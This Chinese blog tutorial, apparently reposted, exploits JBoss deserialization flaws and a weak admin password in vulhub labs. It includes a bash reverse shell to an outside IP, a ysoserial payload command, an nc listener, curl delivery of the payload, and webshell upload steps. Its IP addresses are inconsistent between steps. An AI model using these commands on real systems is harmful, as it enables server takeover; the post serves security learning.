当前位置: 首页 > news >正文

常见中间件漏洞:Jboss篇

CVE-2015-7501

环境搭建

cd vulhub-master/jboss/JMXInvokerServlet-deserialization

docker-compose up -d

过程

访问网址,存在页面说明接口存在且存在反序列化漏洞

http://8.130.17.222:8080/invoker/JMXInvokerServlet

 

2.下载 ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

将反弹shell进行base64编码

bash -i >& /dev/tcp/8.130.17.222/6666 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA= 39java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA=}|{base64,-d}| {bash,-i} ">exp.ser

 3.监听端口

nc -lvvp 6666

4.执行命令

curl http://121.40.229.129:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

5.受到监听后反弹成功

CVE-2017-7504

漏洞介绍

41JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的 HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码执行

环境搭建

cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d

过程

访问网站

python3 jexboss.py -u http://8.130.17.222:8080
https://blog.csdn.net/weixin_44971640/article/details/128313851

CVE-2017-12149

漏洞介绍

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过 滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞

环境搭建

cd vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

过程

访问网站

访问这个网站http://8.130.17.222:8080/invoker/readonly,出现500说明存在

3. 使用工具进行检测 DeserializeExploit 如果成功直接上传webshell即可:工具:
https://cdn.vulhub.org/deserialization/DeserializeExploit.jar
也可以直接执行命令: https://github.com/yunxu1/jboss-_CVE-2017-12149

Administration Console弱口令

漏洞描述

Administration Console管理页面存在弱口令,`admin:admin`,登陆后台上传war包 , getshell

环境搭建

cd vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

密码文件

/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties

账户密码:admin:vulhub

过程

打开网站

http://8.130.17.222:8080/admin-console/login.seam

登录来到后台

点击web应用

上传后门shell压缩包

http://8.130.17.222:8080/shell/1.jsp链接即可

http://www.dtcms.com/a/87869.html

相关文章:

  • 龙虎榜——20250324
  • 南方CASS安装流程
  • 2000-2019年各省地方财政车船税数据
  • 蓝桥杯跑步问题
  • 计算机操作系统处理机调度(1)
  • 记录我的ICME2025论文之旅:困顿与收获
  • Vue 3.4组合式API深度解析
  • 七、python函数
  • 如何进行灌区闸门自动化改造-闸门远程控制系统建设
  • 常见框架漏洞(iis)
  • Java的安全性体现在多个关键方面
  • SQL语言的游戏优化
  • C# 中实现 跨线程写入
  • 在shell脚本内部获取该脚本所在目录的绝对路径
  • Wi-Fi模块集成到现有蓝牙逻辑板中
  • tryhackme——Enumeration
  • 【人工智能】机器学习中的评价指标
  • Linux 系统关机和重启指令
  • Vue的计算属性和侦听器有什么区别,在什么场景下使用它们?
  • ChatGPT降低论文AIGC重复率的提示词合集(高效降重方法)
  • Milvus Java SDK
  • 5个视角、5等级及10档次:《数字化转型领域 参考架构》国家标准正式出台
  • Baklib企业CMS的核心功能是什么?
  • SvelteKit 最新中文文档教程(9)—— 部署静态站点与单页应用
  • TDengine 用户权限管理
  • 【Unity】批处理和实例化的底层优化原理(未完)
  • 原子化CSS
  • 23种设计模式-代理(Proxy)设计模式
  • 8路CXP相机采集系统介绍
  • 18,C++——哈希